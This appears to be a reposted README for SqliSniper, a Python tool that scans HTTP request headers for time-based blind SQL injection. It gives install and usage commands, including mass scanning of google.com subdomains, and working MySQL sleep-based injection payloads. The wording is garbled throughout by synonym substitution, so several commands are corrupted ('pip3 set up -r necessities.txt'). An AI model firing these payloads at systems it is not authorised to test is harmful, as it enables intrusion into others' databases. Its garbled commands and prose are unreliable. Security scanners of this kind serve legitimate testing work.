SqliSniper is a sturdy Python instrument designed to detect time-based blind SQL injections in HTTP request headers. It enhances the safety evaluation course of by quickly scanning and figuring out potential vulnerabilities utilizing multi-threaded, guaranteeing velocity and effectivity. Not like different scanners, SqliSniper is designed to eliminates false positives via and ship alerts upon detection, with the built-in Discord notification performance.
Key Options
- Time-Based mostly Blind SQL Injection Detection: Pinpoints potential SQL injection vulnerabilities in HTTP headers.
- Multi-Threaded Scanning: Provides quicker scanning capabilities via concurrent processing.
- Discord Notifications: Sends alerts through Discord webhook for detected vulnerabilities.
- False Constructive Checks: Implements response time evaluation to distinguish between true positives and false alarms.
- Customized Payload and Headers Assist: Permits customers to outline customized payloads and headers for focused scanning.
Set up
git clone https://github.com/danialhalo/SqliSniper.git
cd SqliSniper
chmod +x sqlisniper.py
pip3 set up -r necessities.txt
It will show assist for the instrument. Listed here are all of the choices it helps.
ubuntu:~/sqlisniper$ ./sqlisniper.py -h███████╗ ██████╗ ██╗ ██╗ ███████╗███╗ ██╗██╗██████╗ ███████╗██████╗
██╔════╝██╔═══██╗██║ ██║ ██╔════╝████╗ ██║██║██╔══██╗██╔════╝██╔══██╗
██████╗██║ ██║██║ ██║ ███████╗██╔██╗ ██║██║██████╔╝█████╗ ██████╔╝
╚════██║██║▄▄ ██║██║ ██║ ╚════██║██║╚██╗██║██║██╔═══╝ ██╔══╝ ██╔══██╗
███████║╚██ ███╔╝███████╗██║ ███████║██║ ╚████║██║██║ ███████╗██║ ██║
╚══════╝ ╚══▀▀═╝ ╚══════╝╚═╝ ╚══════╝╚═╝ ╚═══╝╚═╝╚═╝ ╚══════╝╚═╝ ╚═╝
-: By Muhammad Danial :-
utilization: sqlisniper.py [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PA YLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
[--threads THREADS]
Detect SQL injection by sending malicious queries
choices:
-h, --help present this assist message and exit
-u URL, --url URL Single URL for the goal
-r URLS_FILE, --urls_file URLS_FILE
File containing a listing of URLs
-p, --pipeline Learn from pipeline
--proxy PROXY Proxy for intercepting requests (e.g., http://127.0.0.1:8080)
--payload PAYLOAD File containing malicious payloads (default is payloads.txt)
--single-payload SINGLE_PAYLOAD
Single payload for testing
--discord DISCORD Discord Webhook URL
--headers HEADERS File containing headers (default is headers.txt)
--threads THREADS Variety of threads
Single Url Scan
The url might be supplied with -u flag
for single web site scan
./sqlisniper.py -u http://instance.com
File Enter
The -r flag
permits SqliSniper to learn a file containing a number of URLs for simultaneous scanning.
./sqlisniper.py -r url.txt
piping URLs
The SqliSniper may labored with the pipeline enter with -p flag
cat url.txt | ./sqlisniper.py -p
The pipeline characteristic facilitates seamless integration with different instruments. As an illustration, you’ll be able to make the most of instruments like subfinder and httpx, after which pipe their output to SqliSniper for mass scanning.
subfinder -silent -d google.com | kind -u | httpx -silent | ./sqlisniper.py -p
Scanning with customized payloads
By default the SqliSniper use the payloads.txt file. Nonetheless --payload flag
can be utilized for offering customized payloads file.
./sqlisniper.py -u http://instance.com --payload mssql_payloads.txt
Whereas utilizing the customized payloads file, be sure that you substitute the sleep time with %__TIME_OUT__%
. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file ought to appear to be this.
ubuntu:~/sqlisniper$ cat payloads.txt
0"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR"Z
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z
Scanning with Single Payloads
If you wish to solely check with the one payload --single-payload flag
can be utilized. Ensure that to switch the sleep time with %__TIME_OUT__%
./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"
Scanning Customized Header
Headers are saved within the file headers.txt for scanning customized header save the customized HTTP Request Header in headers.txt file.
ubuntu:~/sqlisniper$ cat headers.txt
Person-Agent: Mozilla/5.0 (Home windows NT 10.0; Win64; x64)
X-Forwarded-For: 127.0.0.1
Sending Discord Alert Notifications
SqliSniper additionally presents Discord alert notifications, enhancing its performance by offering real-time alerts via Discord webhooks. This characteristic proves invaluable throughout large-scale scans, permitting immediate notifications upon detection.
./sqlisniper.py -r url.txt --discord <web_hookurl>
Multi-Threading
Threads might be outlined with --threads flag
./sqlisniper.py -r url.txt --threads 10
Be aware: It’s essential to contemplate that using a better variety of threads would possibly result in potential false positives or overlooking legitimate points. Because of the nature of time-based SQL injection it is strongly recommended to make use of decrease thread for extra correct detection.